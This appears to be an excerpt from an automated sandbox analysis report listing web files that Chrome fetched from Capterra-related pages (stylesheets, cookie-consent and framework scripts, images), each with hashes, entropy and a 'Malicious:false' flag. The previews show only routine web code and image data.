                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (15937)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):16030
                                                                                                                                                                                                        Entropy (8bit):4.92502539310949
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:tNSijR1sR/C4/Qk5GHpG7wTVZAA1wr2iH+C5:twijR1sR/C4/QkM4wTVZnSaiH+C5
                                                                                                                                                                                                        MD5:1E86D664823A8277FA67B1912C0DF47C
                                                                                                                                                                                                        SHA1:CB5716023915E24A136F8ACC92D82149C2AFF8D0
                                                                                                                                                                                                        SHA-256:21C80D480D59679E364FBF51C9B0E51822241F31DC1905F44F51BA987B001FA2
                                                                                                                                                                                                        SHA-512:181476C5CDAEDD6D4A55FA745F67A580FCCA17542318E1E2D92814AE5E487A490342EA57F6060D8C5BF6F6A7A99212076D7F1C5C8178C84BF6FA791BE497F4B2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://prod.adobeccstatic.com/unav/1.2/UniversalNav.css
                                                                                                                                                                                                        Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */...universal-nav-container #universal-nav.universal-nav-light{--alias-content-neutral-default:#292929;--alias-background-semantic-accent-default-express:#5258E4;--alias-background-semantic-accent-default-spectrum:#0265DC;--alias-background-semantic-accent-default-spectrum-2:#3B63FB;--alias-background-semantic-accent-hover-spectrum-2:#274DEA;--alias-background-semantic-accent-hover-spectrum:#0054B6;--alias-background-semantic-accent-hover-express:#4046CA;--alias-content-neutral-key-focus:#507BFF;--border:#E1E1E1;--palette-gray-200:#E1E1E1;--spectrum-gray-200:#E1E1E1;--focus-ring:#507BFF;--profile-cta-secondary-border:#DADADA;--alias-background-neutral-default:#292929;--profile-cta-hover-border:#C6C6C6;--white-text:#FFF;--palette-gray-25:#FFF;--palette-gray-75:#F3F3F3;--palette-gray-400:#C6C6C6;--palette-gray-100:#E9E9E9;--appFrame-layer-2:#FFFFFF;--menu-cta-neutral-hover:#F5F5F5}.universal-nav-con
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (21229)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):21230
                                                                                                                                                                                                        Entropy (8bit):5.307556199296145
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:TRFZ2wWtdbD5ABwXwLrekrff8eTr+x5RxMc9n9LuJ4vV/:T8wAD5ABwXw+krfflyxzxVn9D/
                                                                                                                                                                                                        MD5:692A3714ECE78CEE4017020F5B18A203
                                                                                                                                                                                                        SHA1:56333F0F458776357A95BA474307C271DEC92280
                                                                                                                                                                                                        SHA-256:50377D1D3E7DCB2C8298FEB8D2505099DF1957E3700A358B993B4CF443FD36E8
                                                                                                                                                                                                        SHA-512:3AABA5FD4732DD120188F11C41A0D71C65B6C4C3AE6D0AB09B86D8491DB8F2F1658377F87CF2705D8764F55135F45D903C6CF5B40A95085E026FE69C1546BEA4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://cdn.cookielaw.org/scripttemplates/otSDKStub.js
                                                                                                                                                                                                        Preview:var OneTrustStub=function(t){"use strict";var a,o,p=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.genVendorsData=[],this.vendorsServiceData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}};(m=g=g||{})[m.Days=1]="Days",m[m.Weeks=7]="Weeks",m[m.Months=30]="Months",m[m.Years=365]="Years",(m=i=i||{}).Name="OTGPPConsent",m[m.ChunkSize=4e3]="ChunkSize
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (11084), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11084
                                                                                                                                                                                                        Entropy (8bit):5.26714858103651
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:sANzVNUBOebwvXDA+mJ4fXOrTIjDJfiRxug9xx+EMZajp:PNbUBOjHmJcOgjDJaR1bMZip
                                                                                                                                                                                                        MD5:65F1D21D5FCC9D21DA758ADABABD0C3C
                                                                                                                                                                                                        SHA1:E0661D07D64C00008BC9D013D16EEC0A0F156DC7
                                                                                                                                                                                                        SHA-256:D2B82E612D2A812E8BE2A57300DAB8923C4F2EDBE7A799E7DA70791B595646FE
                                                                                                                                                                                                        SHA-512:DE7D7DC739CED2E6CFA52C1809144180787ADC3AD5F9B7597C72B9D9BD5EB2F21DE06B1FC12B5034F2458DE428B368772700A6665D3F2E02F148A300239E6183
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:window.Modernizr=function(e,t,n){function r(e){b.cssText=e}function o(e,t){return r(S.join(e+";")+(t||""))}function a(e,t){return typeof e===t}function i(e,t){return!!~(""+e).indexOf(t)}function c(e,t){for(var r in e){var o=e[r];if(!i(o,"-")&&b[o]!==n)return"pfx"==t?o:!0}return!1}function s(e,t,r){for(var o in e){var i=t[e[o]];if(i!==n)return r===!1?e[o]:a(i,"function")?i.bind(r||t):i}return!1}function u(e,t,n){var r=e.charAt(0).toUpperCase()+e.slice(1),o=(e+" "+k.join(r+" ")+r).split(" ");return a(t,"string")||a(t,"undefined")?c(o,t):(o=(e+" "+T.join(r+" ")+r).split(" "),s(o,t,n))}function l(){p.input=function(n){for(var r=0,o=n.length;o>r;r++)j[n[r]]=!!(n[r]in E);return j.list&&(j.list=!(!t.createElement("datalist")||!e.HTMLDataListElement)),j}("autocomplete autofocus list placeholder max min multiple pattern required step".split(" ")),p.inputtypes=function(e){for(var r,o,a,i=0,c=e.length;c>i;i++)E.setAttribute("type",o=e[i]),r="text"!==E.type,r&&(E.value=x,E.style.cssText="position:
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (19901), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19901
                                                                                                                                                                                                        Entropy (8bit):5.043622321466294
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:kqs2fhM2rYFLY5rEoFf8IFEtXyHCuUTfMpVfeaLXXzh//Y/H:V/pzdwfMpVfR+H
                                                                                                                                                                                                        MD5:8239AEE2019C9503EFD109CBDEFDF435
                                                                                                                                                                                                        SHA1:D9FBD6C5B7BB3F748CC1388A43793A1100F1BF50
                                                                                                                                                                                                        SHA-256:1A174CA2245A28175C42703108EDBC4DA6D6260BA5F5D6C18A264F46A2078C4E
                                                                                                                                                                                                        SHA-512:583A30BAA2FB721A20C08A625597E0D58BA6EAA4E23B6BE928F90A712D3F47365048DAA9F4433239EAD71EADF39428F54D7E00A5E279BBC072BD1C2045FA99F2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9488],{49488:function(r,e,o){o.d(e,{m:function(){return O}});var t=/^\[(.+)\]$/;function n(r,e){var o=r;return e.split("-").forEach(function(r){o.nextPart.has(r)||o.nextPart.set(r,{nextPart:new Map,validators:[]}),o=o.nextPart.get(r)}),o}var i=/\s+/;function l(){for(var r,e,o=0,t="";o<arguments.length;)(r=arguments[o++])&&(e=function r(e){if("string"==typeof e)return e;for(var o,t="",n=0;n<e.length;n++)e[n]&&(o=r(e[n]))&&(t&&(t+=" "),t+=o);return t}(r))&&(t&&(t+=" "),t+=e);return t}function a(r){var e=function(e){return e[r]||[]};return e.isThemeGetter=!0,e}var s=/^\[(?:([a-z-]+):)?(.+)\]$/i,c=/^\d+\/\d+$/,d=new Set(["px","full","screen"]),u=/^(\d+(\.\d+)?)?(xs|sm|md|lg|xl)$/,p=/\d+(%|px|r?em|[sdl]?v([hwib]|min|max)|pt|pc|in|cm|mm|cap|ch|ex|r?lh|cq(w|h|i|b|min|max))|\b(calc|min|max|clamp)\(.+\)|^0$/,f=/^-?((\d+)?\.?(\d+)[a-z]+|0)_-?((\d+)?\.?(\d+)[a-z]+|0)/;function b(r){return y(r)||d.has(r)||c.test(r)||m(r)}functio
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):125933
                                                                                                                                                                                                        Entropy (8bit):5.384136501701716
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:3+KQ2QdFf1HReupIuXogq3W9qpNsUqlMw8905pef2ODXNaN:S11H7479NsUqlm9050fVTNaN
                                                                                                                                                                                                        MD5:72D927FD1A9CEAF31FAF0D6095C395F0
                                                                                                                                                                                                        SHA1:5D29A3ABE568F4C052793D11263DAD2AEC30C159
                                                                                                                                                                                                        SHA-256:9C6E3BCAE923D1BDF4E1139A2A51B1EF9856416C4D2002F708D5CADF0743D9F3
                                                                                                                                                                                                        SHA-512:4F81325E4F4FBE67C4925C487EB6B3CB6F7E4D36AE678222D35B7F52D850AEEBBEA02DB63A6839BAB808AAE2B64C441870BC30912A7ED45F7DAB9618ECBA4C4E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{98749:function(e,t){"use strict";function r(){return""}Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"getDeploymentIdQueryOrEmptyString",{enumerable:!0,get:function(){return r}})},11541:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (799)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5327
                                                                                                                                                                                                        Entropy (8bit):5.056940667467091
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+zpHg/ci55bnkO3cng+MS+9yfnWeQUjqsTiAb0MgVnEHOJgluUc7yhUe9PqGpdxd:+zNg/Pv5QJnWJVLAb0MgVnEHOJAuUvi4
                                                                                                                                                                                                        MD5:1A7FECB4F9B7496D563F6193750A49E3
                                                                                                                                                                                                        SHA1:3B87C682C61E03F689B3023906095FD89E674FC8
                                                                                                                                                                                                        SHA-256:0F8A0F420442C0034553DC843F0013C687CA5FD6BB8B53CC4EC9E80B0C0B2297
                                                                                                                                                                                                        SHA-512:AAFCBF63C48923144D4B6F0AEF21645F7E34A4286F3E0FD623C1C37F38E5A3BC7A1194F005717BF069DD8C2A5098B83A24A6D79A89EDA392160B5A64BF2DC616
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://forms-as-a-service.capterra.com/faas-modal-payload.js?formId=6HyOcTRcBkZLAc2QGex3tl
                                                                                                                                                                                                        Preview:(function () {. function fixScriptTagsNotExecuting(node) {. if (node.tagName === "SCRIPT") {. node.parentNode.replaceChild(cloneScriptNode(node), node);. } else {. var i = -1,. children = node.childNodes;. while (++i < children.length) {. fixScriptTagsNotExecuting(children[i]);. }. }. return node;.}..function cloneScriptNode(node) {. var script = document.createElement("script");. script.text = node.innerHTML;.. var i = -1,. attrs = node.attributes,. attr;. while (++i < attrs.length) {. script.setAttribute((attr = attrs[i]).name, attr.value);. }. return script;.}.. var state={"modalDisplayFrequency":"Once per user, ever","formId":"6HyOcTRcBkZLAc2QGex3tl","baseUrl":"https://forms-as-a-service.capterra.com","isTest":false,"BETA_BASE_URL":"https://forms-as-a-service.capstage.net","BETA_RATE":0,"modalRestrictedUrls":["/sem/","/sem-compare/","/sem-compare-services/","/sem-ppl/","raas.capterra.com","review.capterra.com","reviews.capterra.com","insig
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                        Entropy (8bit):4.389162751096862
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YD9zAX+MX+IAwWEkyX+zPLhVHC:YKX+2+GWm+PS
                                                                                                                                                                                                        MD5:0F2D5408DAB4CB0361D3D52563D8CEAF
                                                                                                                                                                                                        SHA1:524824A3086A4E3A0458E5162C292F6C5E642CC2
                                                                                                                                                                                                        SHA-256:D1749FBFACD11BA7C9921EC472B830C6810A5EEFFE11E3FBEBE85350A80C47B6
                                                                                                                                                                                                        SHA-512:AFCE2E2392EA10919BB71925D31C6E660369A544C63732459D294AB86166BB9F6187FCE25028B2552767D01F9343D9F77B59439A1324236041B6D0894721ED17
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"fileVersion":"1.0.0","framesData":[],"schemaVersion":"2.0.0"}.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3807
                                                                                                                                                                                                        Entropy (8bit):7.923976100937747
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:qwsN0yXpMa4QwU1GT8jtB3etY9jH0a32D8wS4woajQGPQzts0rHoVAV2CwOgKa0u:q5XpMa1H1GgnumGAwS4w7HP1eIVAVBzu
                                                                                                                                                                                                        MD5:288307C584E79CD3EBF924A4F5FE2986
                                                                                                                                                                                                        SHA1:AF3D5CC7C16528A8D419FFD2537710FBD857CDA4
                                                                                                                                                                                                        SHA-256:AF6D7D68F4FA6E3E7BB8908D154D346A8433160C45672C0A6388095A6305A091
                                                                                                                                                                                                        SHA-512:4AF342A4AD76D9D2AAC65EC2A65E16C76766EA19C32E81D6D9F3F260E705776A5E005FFB960D71D6E3A662E0A88B1338D37C65058525555DED4E454F6928E6B6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.....9d6.....sRGB.........IDATx^.........woUw..f...E...x..Q4&.....$.q...q..z..B.....U<n|$.ht.&.<.j....5._.3(.0.L..~.[=.....je...)...u.....n}u.p..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q.......P..t,4..:.B.[_@]]...L.^..'@.j#......K.2..Zf...M.....%..S..-.e[&..1Dz..[..HQ.........1...!j8......==..o\...c..W..<.SO......O..(.[...".K.\3p...Hg9.z.O.O...;+.de.7...U[..v.'.gO.8$.;.!..C:.j.....7...@....{l.d!.zL9.b...i....>O.....QJ...|.b. ..W..P.!3..hE..SO=..,....l$....8........uEu.....#...K...y.`......f..q......;..B....^..v.:PA...|C....-.`"z4.^..mt..y:z.Ua..o.Hw.f.. ...D-..n.$.....T. dHh{...B1..3..k......{O.05.z....H..{M....{PL.&.Ar7..~M.e..c..n...u.-....!P..T.d#....b.(.t...f.......y3.........Z}G..3vN9.J_Ie6.7..\....u....... ..0.1m.6|L...|xL...2P.."jss.y.u.O|....p......2e.....[qE.R.'"<^.UJ..v..tM.~....w.;?...E./.<dM.\Z....K...L|!..Y3.|[.......t[Hu.m..e...8(....E...z.....:..>.K.....=.=..<|e."/._....Kz.....A....'...P.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):9283
                                                                                                                                                                                                        Entropy (8bit):3.806105909665875
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:sjFpQzHwGAD7rLb2xzQyAme+5vedMYrlLCF4azcthiVD1ZaO:sjj/GgrLqx0yVh5WlWOnthiZp
                                                                                                                                                                                                        MD5:ABA2EEED5A7A027E738C534B39F81FD8
                                                                                                                                                                                                        SHA1:69C03E4E51D37FBB1EEB98BB4639E3D024E900E2
                                                                                                                                                                                                        SHA-256:B754F2F5012D19DFDACF148845C8CC7E41D5F5AA6F6656E4AC4D1F748DD8A150
                                                                                                                                                                                                        SHA-512:5347BF1F36DA25D4FE8A542FCE324D5D38A6952BCAD18167CAD70FD479E19B801F0CB415AA19B47CC57C6FE808F9A0A0AB05902186350482F1B297E84E42D4D7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/media/logo.915ba944.svg
                                                                                                                                                                                                        Preview:<svg viewBox="0 0 1500 344.983" xmlns="http://www.w3.org/2000/svg"><path d="m8.905 127.38 135.181.027 82.199.014v-81.434z" fill="#ff9d28"/><path d="m226.285 45.987v287.503l102.665-325.956z" fill="#68c5ed"/><path d="m226.285 127.421-82.199-.014 82.199 206.083z" fill="#044d80"/><path d="m8.905 127.38 156.26 52.905-21.079-52.878z" fill="#e54747"/><path d="m506.884 257.809c-1.192 1.192-3.178 2.679-5.955 4.465-2.782 1.788-6.402 3.574-10.868 5.362-4.466 1.784-9.928 3.32-16.376 4.615-6.454 1.287-13.845 1.934-22.182 1.934-16.08 0-29.976-2.582-41.686-7.74-11.715-5.158-21.391-12.359-29.031-21.587-7.643-9.231-13.249-20.146-16.822-32.754-3.573-12.604-5.359-26.448-5.359-41.536 0-15.082 1.935-29.03 5.806-41.833 3.87-12.804 9.676-23.866 17.417-33.2 7.742-9.327 17.419-16.623 29.032-21.885 11.612-5.256 25.257-7.89 40.94-7.89 7.742 0 14.739.697 20.992 2.084 6.253 1.39 11.71 3.029 16.377 4.913 4.661 1.889 8.533 3.87 11.612 5.955 3.075 2.084 5.407 3.825 6.998 5.21 1.786 1.592 3.322 3.476 4.615 5.657 1.289
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (1156)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):17898
                                                                                                                                                                                                        Entropy (8bit):5.238696918928918
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:wpH4yQJR2gv0VX4yaa4S4S4E4SMaM4gvc5G4:tX4
                                                                                                                                                                                                        MD5:B8F99E1E000A15D33D0D8AC47CC2E6EF
                                                                                                                                                                                                        SHA1:8FCB7504F1334C6D1E82EB87473C8AE923ECFD11
                                                                                                                                                                                                        SHA-256:42F105AB3A71F23589C77E720534BC36E92FA66402A4A655B606B7BB7128AAB9
                                                                                                                                                                                                        SHA-512:D0F048984EDE5837EEC2EC61FEB984738A1F29DCCBD7A6C27DC85D6E1CB36F9076E74BC13BB6C7E83AB11D5C61138B57354BC37882787D06C21447C989A18250
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://pblc.me/pub/40f029dddc28e3
                                                                                                                                                                                                        Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html>...<head>....<meta name="viewport" content="width=device-width">....<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<title>Publicate Newsletter</title>....<style type="text/css">td{box-sizing:border-box;border-collapse:collapse}tr{box-sizing:border-box;border-collapse:collapse}th{box-sizing:border-box;border-collapse:collapse}table{box-sizing:border-box;border-collapse:collapse}@media screen and (max-width:480px){.pubMB,tbody,td,tr{display:block}.fixedTable tbody{display:table-row-group}.fixedTable tr{display:table-row}.fixedTable td{display:table-cell}#templateColumns{width:100%!important}.templateColumnContainer{display:block!important;width:100%!important}.sFW{width:100%!important;max-width:100%!important}.columnImage{height:auto!important;max-width:480px!important;width:100%!important}.leftColumnContent{font-size:16px!important;line
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):144
                                                                                                                                                                                                        Entropy (8bit):4.54178832719941
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YAv+e9BAJ6YSm7XJHIzRNg+wjNXWRwFH1j66qVVJMdMQUWKLb+AHfgq+WRHYn:YAme2J6YBDJHIlNgDXWqH1jwVJMyb/4l
                                                                                                                                                                                                        MD5:F447C440ABF2B8AF203938329FE494F8
                                                                                                                                                                                                        SHA1:3E071AE6400D84FB2EBE38EAEE60E1161D9F4556
                                                                                                                                                                                                        SHA-256:11BBA994684E05187E8CB291F03254CE7810FB3EABBC900299F078F2E584550F
                                                                                                                                                                                                        SHA-512:BC05CEC72D8512A1CE483156BDCD963199EBFFD224D991AABAD638D3FA075CD7C96E20B20B85C7224925B8263143772174B3BC824EA258C0B196C83E03007C9F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"errors":[{"code":"media_type_not_acceptable","message":"The Accept header should send a media type of application/json"}],"type":"error.list"}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12465), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12465
                                                                                                                                                                                                        Entropy (8bit):5.143073751658841
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:VPUJSC+IBjai4s9maJb7GKuJt6HHfPcR3WriRcVEvoh2uj5li/spF7uxQ4wsJvUk:Vc49Il/URxTduq0F765UNMrd
                                                                                                                                                                                                        MD5:70D60F116BE0547CD0A4192C213F2CCB
                                                                                                                                                                                                        SHA1:1A517CBEC805E9148CC40A91CD440FCFEBDFC608
                                                                                                                                                                                                        SHA-256:E186DBBF953431129D19D46D52AD1BFBE6232CED1752EFC48EA1F3EC0AB00422
                                                                                                                                                                                                        SHA-512:695DBB34ED677B95677442381DE3585D6D5A728D06E4974316A7977CDAC696F62A03576AA99B4D3EFC3F2E3D3713DABE85B0693A1C3CE924404732520BF9E98B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/speed-insights-bx-capterra-www/_vercel/speed-insights/script.js
                                                                                                                                                                                                        Preview:"use strict";(()=>{var e=(e,t)=>()=>(e&&(t=e(e=0)),t),t=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);function n(e){let t=location.href;if(e){let n=new URL(t);if(n.pathname!==e)return n.pathname=e,n.search="",n.href}return t}var r,i,a,o,u,c,s,l,f,d,v,m,p,h,g,y,T,S,E,b,L,w,C,M,x,k,A,F,I,B,D,P,R,N,q,O,H,V,U,_,j,J,$,z,G,K,Q,W,X,Y,Z,ee,et,en,er,ei,ea,eo,eu,ec,es,el=e(()=>{}),ef=e(()=>{c=function(){return window.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0]},s=function(e){if("loading"===document.readyState)return"loading";var t=c();if(t){if(e<t.domInteractive)return"loading";if(0===t.domContentLoadedEventStart||e<t.domContentLoadedEventStart)return"dom-interactive";if(0===t.domComplete||e<t.domComplete)return"dom-content-loaded"}return"complete"},l=function(e){var t=e.nodeName;return 1===e.nodeType?t.toLowerCase():t.toUpperCase().replace(/^#/,"")},f=function(e,t){var n="";try{for(;e&&9!==e.nodeType;){var r=e,i=r.id?"#"+r.id:l(r)+(r.classL
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6471
                                                                                                                                                                                                        Entropy (8bit):7.475856695352717
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7ji/5N26MT0D5MdtbZPAVwzVJk99zvxvb5fMk4Rw9i4dSql7WC:+7u/oYNMtKwXk9v5fxhI497N
                                                                                                                                                                                                        MD5:DDC7AC197031797B6049F84B6AD2F0DC
                                                                                                                                                                                                        SHA1:509BB43A93D9FA065C983D65530F9CDEA7CD0030
                                                                                                                                                                                                        SHA-256:2D13702F747FDB7C124E309AF46AF812E9101EF687FDABE2BBB77DF497553DC6
                                                                                                                                                                                                        SHA-512:C6B1EAA7F9CC663553B7705EF5BBBC0D80109306597D7FA1AF2D7AAC839335D4F57713D1AC748DC92654014286271039A7760ED7953F1155D27EDF70C60AE9BE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/0a941fc9-5fda-4010-807b-044a6d6ff89b.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (11172), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11180
                                                                                                                                                                                                        Entropy (8bit):5.37118068503325
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:+QQIN28utVYgNW/Bd03Fq1N4We/NxOTu0GNhneRxr/4wIHWncZ:+QTBezW83Fq1OWe/NUTufnuxr+z
                                                                                                                                                                                                        MD5:D08C382407F0FE13EA956861865894A8
                                                                                                                                                                                                        SHA1:3BAC5E65A7D9F7344C068EDF1A566A4FEC7ACCFA
                                                                                                                                                                                                        SHA-256:C7E241D09233B3EF6BE9B121831BF8C62CA610377F981EED7FF7DA4008A248E4
                                                                                                                                                                                                        SHA-512:48CBEC3FEA203D099D3351649A0AAFA74B9B116EF3F45BBE8D502481490BF297231C6602C13A6C697D5D8197727F5AB406C57C2E62B81B4E925B126A6DB2D28C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1304],{84362:function(e,t,n){n.d(t,{h:function(){return r.hU},v:function(){return r.vl}});var r=n(20857)},33588:function(e,t,n){n.r(t),n.d(t,{Breadcrumbs:function(){return r.Oo},Drawer:function(){return r.dy},MediaGallery:function(){return r.ew},Pagination:function(){return r.tl},StarRating:function(){return r.ZF}});var r=n(62780)},34617:function(e,t,n){n.r(t),n.d(t,{Accordion:function(){return a.UQ},Alert:function(){return a.bZ},Avatar:function(){return a.qE},Badge:function(){return a.Ct},Button:function(){return a.zx},Card:function(){return a.Zb},ColorMode:function(){return a.UX},Dropdown:function(){return a.Lt},Element:function(){return a.W_},EventContext:function(){return i.Af},Form:function(){return a.l0},Icon:function(){return a.JO},Link:function(){return a.rU},List:function(){return a.aV},ListItem:function(){return o},Modal:function(){return a.u_},ProgressBar:function(){return a.ko},Rule:function(){return a.$9
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (11808), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11808
